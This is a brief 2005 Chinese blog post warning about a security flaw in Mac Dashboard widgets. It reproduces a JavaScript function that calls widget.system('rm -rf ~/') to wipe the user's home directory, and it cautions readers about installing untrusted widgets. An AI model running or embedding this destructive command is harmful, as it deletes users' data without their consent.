Dashboard widget 的安全大漏洞
6月 24th, 2005 2 Comments »
<script type=’text/javascript’>
function test(){
if(widget){
widget.system('rm -rf ~/', null);
}
}
以後亂抓 Widget 時要小心了,不然,像上面隨便一個 system 呼叫,就把你的硬碟資料砍光光了…